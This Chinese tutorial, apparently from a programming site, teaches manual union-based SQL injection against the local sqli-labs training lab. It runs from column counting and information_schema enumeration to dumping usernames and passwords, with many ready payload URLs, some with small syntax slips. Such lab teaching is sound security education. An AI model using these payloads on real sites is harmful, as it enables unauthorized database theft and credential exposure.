前言
這篇文章就是一個(gè)最基本的SQl手工注入的過程了���。基本上在sqlilabs上面的實(shí)驗(yàn)�,如果知道了其中的全部知識(shí)點(diǎn),都可以通過以下的步驟進(jìn)行脫褲��。下面的這個(gè)步驟也是其他的脫褲手段的基礎(chǔ)��。如果想要精通SQL注入�����,那么這個(gè)最基本的脫褲步驟是必須了解和掌握的����。
為了方便說明,我們還是用之前的數(shù)字型的注入點(diǎn)為例來進(jìn)行說明���。
得到字段總數(shù)
在前面的介紹中�����,我們已經(jīng)知道在http://localhost/sqlilabs/Less-2/?id=1id是一個(gè)注入點(diǎn)��。
后臺(tái)的SQL語句的寫法大致為
select username,password,[....] from table where id=userinput
那么我們通過使用order by的語句來判斷select所查詢字段的數(shù)目���。
那么payload變?yōu)椋?/p>
http://localhost/sqlilabs/Less-2/?id=1 order by 1/2/3/4....
當(dāng)使用order by 4時(shí)程序出錯(cuò),那么select的字段一共是3個(gè)�����。
得到顯示位
在頁面上會(huì)顯示從select中選取的字段��,我們接下來就是要判斷顯示的字段是哪幾個(gè)字段�。
使用如下的payload(兩者均可)進(jìn)行判斷。
http://localhost/sqlilabs/Less-2/?id=-1 union select 1,2,3
http://localhost/sqlilabs/Less-2/?id=1 and 1=2 union select 1,2,3
當(dāng)使用個(gè)如上的payload時(shí)�,頁面的顯示如下:
通過如上的頁面顯示就可以知道,頁面中顯示的是第2位和第3位的信息��。
查選庫
在知道了顯示位之后,那么接下來就可以通過顯示位來顯示我們想知道的信息����,如數(shù)據(jù)庫的版本,用戶信息等等��。那么我們使用如下的payload就可以知道相關(guān)的信息���。
http://localhost/sqlilabs/Less-2/?id=-1 union select 1,version(),database()
此時(shí)頁面的顯示為:
可以看到在頁面上就出現(xiàn)了數(shù)據(jù)庫的版本信息和當(dāng)前使用的數(shù)據(jù)庫信息���。
那么接下來我們通過這種方式知道數(shù)據(jù)庫中所有的數(shù)據(jù)庫的名稱。
payload如下:
http://localhost/sqlilabs/Less-2/?id=-1 union select 1,2,SCHEMA_NAME, from information_schema.SCHEMATA limit 0,1 #得到第一個(gè)庫名
http://localhost/sqlilabs/Less-2/?id=-1 union select 1,2,SCHEMA_NAME, from information_schema.SCHEMATA limit 1,1 #得到第二個(gè)庫名
...
查選表名
由于database()返回的就是當(dāng)前web程序所使用的數(shù)據(jù)庫名��,那么我們就利用database()來查詢所有的表信息�����。當(dāng)然在上一步中���。我們也已經(jīng)知道當(dāng)前的database就是security����。
那么我們構(gòu)造的payload如下:
http://localhost/sqlilabs/Less-2/?id=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()
這樣我們就得到當(dāng)前數(shù)據(jù)庫下所有的表名了��。頁面返回的結(jié)果是:
所以我們知道在當(dāng)前的數(shù)據(jù)庫中存在4張表�,分別是emails,referers,uagents,users。
查選列名
在知道了表名之后�,接下來我們利用information_schema.columns就可以根據(jù)表名來獲取當(dāng)前表中所有的字段。
payload如下:
http://localhost/sqlilabs/Less-2/?id=-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users'
http://localhost/sqlilabs/Less-2/?id=-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_name=0x7573657273(users的十六進(jìn)制)
頁面的顯示結(jié)果如下:
通過這個(gè)語句����,我們就知道在users表中存在USER,CURRENT_CONNECTIONS,TOTAL_CONNECTIONS,id,username,password,id,name,password這些字段。但是我本地測試的測試的時(shí)候����,這個(gè)存在一個(gè)問題,實(shí)際上在security數(shù)據(jù)庫的users的表中�,只有id,username,password這3個(gè)字段,其他的字段都是其他數(shù)據(jù)庫的中users表的字段名��。
通過上面的payload����,我們也同樣可以知道在emails,referers,uagents中的字段名稱。
但是有的時(shí)候后臺(tái)的代碼可能僅用了使用where子句��,那么這個(gè)時(shí)候就無法通過information_schema.coumns來得到列名了�����,這個(gè)時(shí)候只能夠根據(jù)你自己多年的黑客經(jīng)驗(yàn)來進(jìn)行猜解了。猜解的方法也是比較的簡單�,使用exists子句就可以進(jìn)行猜解了。假設(shè)在我們已經(jīng)知道了表名的情況下(當(dāng)然猜解表名也使用通過exists子句來完成)�。
猜解的語句如下:
http://localhost/sqlilabs/Less-2/?id=1 and exists(select uname from users)
主要的語句就是exists(select 需要猜解的列名 from users)這種句式。如果在users表中不存在uname列名�����,則頁面不會(huì)顯示內(nèi)容或者是直接出現(xiàn)sql的錯(cuò)誤語句��。
如下如所示:
下面這個(gè)就是猜解到了users表中存在的字段�。
http://localhost/sqlilabs/Less-2/?id=1 and exists(select username from users)
猜測在users表中存在username列,上面的語句程序可以正常第返回結(jié)果�����,那么壽命在users表中確實(shí)存在username列名�。
脫褲
在知道了當(dāng)前數(shù)據(jù)庫所有的表名和字段名之后,接下來我們就可以dump數(shù)據(jù)庫中所有的信息了��。比如我們下載當(dāng)前users表中所有的數(shù)據(jù)���。
可以使用如下的payload:
http://localhost/sqlilabs/Less-2/?id=-1 union select 1,group_concat(username,password),3 from users
就可以得到users表中所有的username和password的數(shù)據(jù)了����,通過這種方式也能夠得到其他表中的數(shù)據(jù)了。
總結(jié)
以上就是說sql手工注入的完整示例介紹�,不知道大家都學(xué)會(huì)了�����?小編還需繼續(xù)更新關(guān)于sql注入的文章����,請(qǐng)繼續(xù)關(guān)注腳本之家。
您可能感興趣的文章:- 利用SQL注入漏洞登錄后臺(tái)的實(shí)現(xiàn)方法
- 有效防止SQL注入的5種方法總結(jié)
- 利用SQL注入漏洞拖庫的方法
- SQL注入中繞過 單引號(hào) 限制繼續(xù)注入
- MySQL 及 SQL 注入與防范方法
- 防御SQL注入的方法總結(jié)
- SQL數(shù)據(jù)庫的高級(jí)sql注入的一些知識(shí)
- SQL 注入式攻擊的終極防范
- 關(guān)于SQL注入中文件讀寫的方法總結(jié)
- sql注入教程之類型以及提交注入
